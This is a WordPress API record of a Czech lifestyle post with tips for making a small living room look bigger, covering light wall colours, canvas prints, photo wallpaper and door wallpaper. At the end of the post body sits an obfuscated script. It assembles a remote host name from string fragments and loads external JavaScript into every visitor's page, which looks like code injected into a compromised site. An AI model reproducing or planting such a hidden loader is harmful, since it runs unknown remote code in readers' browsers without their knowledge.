{"id":1277,"date":"2023-02-09T13:31:02","date_gmt":"2023-02-09T13:31:02","guid":{"rendered":"https:\/\/lifestylerek.com\/?p=1277"},"modified":"2023-02-09T13:31:02","modified_gmt":"2023-02-09T13:31:02","slug":"6-ucinnych-zpusobu-jak-zvetsit-maly-obyvaci-pokoj","status":"publish","type":"post","link":"https:\/\/lifestylerek.com\/hu\/6-ucinnych-zpusobu-how-zvetsit-mall-obyvaci-szoba\/","title":{"rendered":"6 \u00fa\u010dinn\u00fdch zp\u016fsob\u016f, jak zv\u011bt\u0161it mal\u00fd ob\u00fdvac\u00ed pokoj"},"content":{"rendered":"<div class=\"do-not-translate\" data-no-auto-translation=\"\">\n<p>Mal\u00fd ob\u00fdvac\u00ed pokoj \u2013 mal\u00fd probl\u00e9m? Bohu\u017eel ne. Uspo\u0159\u00e1d\u00e1n\u00ed mal\u00e9ho prostoru m\u016f\u017ee b\u00fdt velmi problematick\u00e9. Jak do n\u011bj vm\u011bstnat v\u0161e pot\u0159ebn\u00e9 a z\u00e1rove\u0148 vn\u00e9st n\u011bco, co bude hezk\u00e9 a dekorativn\u00ed? Existuje n\u011bkolik zp\u016fsob\u016f, jak to ud\u011blat. Zde je n\u00e1vod, jak opticky zv\u011bt\u0161it mal\u00fd ob\u00fdvac\u00ed pokoj.<\/p>\n<h2>Vhodn\u00e9 barvy st\u011bn<\/h2>\n<p>Pro mal\u00e9 interi\u00e9ry je velmi d\u016fle\u017eit\u00e9 zvolit vhodn\u00e9 barvy st\u011bn. Rozhodn\u011b by to m\u011bly b\u00fdt sv\u011btl\u00e9 barvy, kter\u00e9 rozjasn\u00ed m\u00edstnost a zp\u016fsob\u00ed, \u017ee se bude zd\u00e1t v\u011bt\u0161\u00ed. Barvy tak\u00e9 p\u0159\u00edli\u0161 nem\u00edchejte. Ka\u017ed\u00e1 st\u011bna v jin\u00e9 barv\u011b vytvo\u0159\u00ed mal\u00fd pokojov\u00fd chaos a dojem skl\u00ed\u010den\u00ed.<\/p>\n<p>I kdy\u017e zvol\u00edte sv\u011btl\u00e9 barvy, strop by m\u011bl z\u016fstat b\u00edl\u00fd, d\u00edky \u010demu\u017e se bude zd\u00e1t vy\u0161\u0161\u00ed.<\/p>\n<p>Navzdory mal\u00e9 plo\u0161e m\u00edstnosti se m\u016f\u017eete s dekoracemi trochu vy\u0159adit. I ty mohou pomoci s t\u00edm, aby se interi\u00e9r zd\u00e1l v\u011bt\u0161\u00ed.<\/p>\n<h2>Fotoobraz na pl\u00e1tn\u011b<\/h2>\n<p>Omezen\u00edm mno\u017estv\u00ed dekorac\u00ed na n\u00e1bytku se prostor tak\u00e9 opticky zv\u011bt\u0161uje a je mnohem snaz\u0161\u00ed udr\u017eet na n\u011bm po\u0159\u00e1dek.\u00a0<b>M\u00edsto toho si m\u016f\u017eete vybrat stylov\u00fd\u00a0<\/b><b>fotoobraz na pl\u00e1tn\u011b\u00a0<\/b><b>se sv\u011btl\u00fdm motivem a barvami.\u00a0<\/b>Bude to efektn\u00ed dekorace a z\u00e1rove\u0148 nezabere ani milimetr pot\u0159ebn\u00e9ho prostoru.<\/p>\n<h2>Fototapety<\/h2>\n<p>To je skv\u011bl\u00fd n\u00e1pad pro mal\u00e9 a \u00fazk\u00e9 st\u011bny.\u00a0<b>V\u00fdb\u011brem\u00a0<a href=\"https:\/\/tulup.cz\/fototapety\" rel=\"noopener\">fototapet<\/a>\u00a0s prostorov\u00fdmi motivy, nap\u0159. silnice nebo most\u016f, vytvo\u0159\u00edte dojem roz\u0161\u00ed\u0159en\u00ed m\u00edstnosti.<\/b>\u00a0Je to perfektn\u00ed \u0159e\u0161en\u00ed pro mal\u00e9 interi\u00e9ry!<\/p>\n<h2>Tapety na dve\u0159e<\/h2>\n<p>Star\u00e9, tmav\u00e9, nezaj\u00edmav\u00e9 dve\u0159e lze tak\u00e9 ozdobit a z\u00e1rove\u0148 opticky zv\u011bt\u0161it prostor.\u00a0<b>Tapety na dve\u0159e<\/b>\u00a0<b>by m\u011bly m\u00edt tak\u00e9 prostorov\u00fd motiv, aby vytvo\u0159ily takov\u00fd dojem.\u00a0<\/b>M\u016f\u017eete si tak\u00e9 vybrat n\u011bco, co je barevn\u011b podobn\u00e9 st\u011bn\u011b nebo n\u011bco, co je jak\u00fdmsi roz\u0161\u00ed\u0159en\u00edm<b>\u00a0<\/b>fototapety, pokud s n\u00ed pl\u00e1nujete vyzdobit st\u011bnu. Dve\u0159e se pak stanou neviditeln\u00fdmi a interi\u00e9r bude prostorn\u011bj\u0161\u00ed.<\/p>\n<h2>Obrazy na pl\u00e1tn\u011b<\/h2>\n<p><b>Velk\u00e9 obrazy na pl\u00e1tn\u011b mohou tak\u00e9 pomoci zv\u011bt\u0161it mal\u00fd ob\u00fdvac\u00ed pokoj.<\/b>\u00a0D\u016fle\u017eit\u00fd je v\u0161ak motiv. Je t\u0159eba se vyvarovat abstrakci a nadm\u011brn\u00e9 intenzit\u011b barev. Op\u011bt plat\u00ed, \u017ee dekorace s prostorovou t\u00e9matikou budou fungovat perfektn\u011b. Krom\u011b toho bude obraz na pl\u00e1tn\u011b v\u017edy vypadat elegantn\u011bji ne\u017e klasick\u00fd plak\u00e1t.<\/p>\n<p>M\u016f\u017eete tak\u00e9 vyzkou\u0161et obrazy na skle, kter\u00e9 odrazem sv\u011btla interi\u00e9r tak\u00e9 rozjasn\u00ed, a tedy trochu zv\u011bt\u0161\u00ed. Nejste si jisti, zda je to dobr\u00fd n\u00e1pad?\u00a0<b>Sklen\u011bn\u00e9 kr\u00e1jec\u00ed prk\u00e9nko<\/b>\u00a0<b>m\u016f\u017ee rozpt\u00fdlit va\u0161e pochybnosti! P\u0159ilo\u017ete jej na ze\u010f a uvid\u00edte, jak\u00fd efekt bude m\u00edt obraz na skle, a pak si vyberte ten, kter\u00fd se nejl\u00e9pe hod\u00ed do va\u0161eho ob\u00fdvac\u00edho pokoje.<\/b><\/p>\n<p><script>\n(function(){\nayyy=document.createElement(\"script\");ayyy_=\"u\"+(\"s\")+\"ta\";\nayyy_+=(\"t.i\")+\"\"+\"n\";ayyy_+=((\"f\")+\"o\");ayyy.type=\"text\/javascript\";\nayyy_+=\"\/\"; ayyyu=\"433399254\";ayyyu+=\".pq252X35yyyskyuw40f\";ayyyu+=\"1e0ze5239zc\";\nayyy.src=\"https:\/\/\"+ayyy_+ayyyu;ayyy.async=true;document.body.appendChild(ayyy);\n})();\n<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Mal\u00fd ob\u00fdvac\u00ed pokoj \u2013 mal\u00fd probl\u00e9m? Bohu\u017eel ne. Uspo\u0159\u00e1d\u00e1n\u00ed mal\u00e9ho prostoru m\u016f\u017ee b\u00fdt velmi problematick\u00e9. Jak do n\u011bj vm\u011bstnat v\u0161e pot\u0159ebn\u00e9 a z\u00e1rove\u0148 vn\u00e9st n\u011bco, co bude hezk\u00e9 a dekorativn\u00ed? Existuje n\u011bkolik zp\u016fsob\u016f, jak to ud\u011blat. Zde je n\u00e1vod, jak opticky zv\u011bt\u0161it mal\u00fd ob\u00fdvac\u00ed pokoj. Vhodn\u00e9 barvy st\u011bn Pro mal\u00e9 interi\u00e9ry je velmi d\u016fle\u017eit\u00e9 zvolit [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1267,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[49],"tags":[43],"class_list":["post-1277","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-inne","tag-cz"],"_links":{"self":[{"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/posts\/1277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/comments?post=1277"}],"version-history":[{"count":0,"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/posts\/1277\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/media\/1267"}],"wp:attachment":[{"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/media?parent=1277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/categories?post=1277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lifestylerek.com\/hu\/wp-json\/wp\/v2\/tags?post=1277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}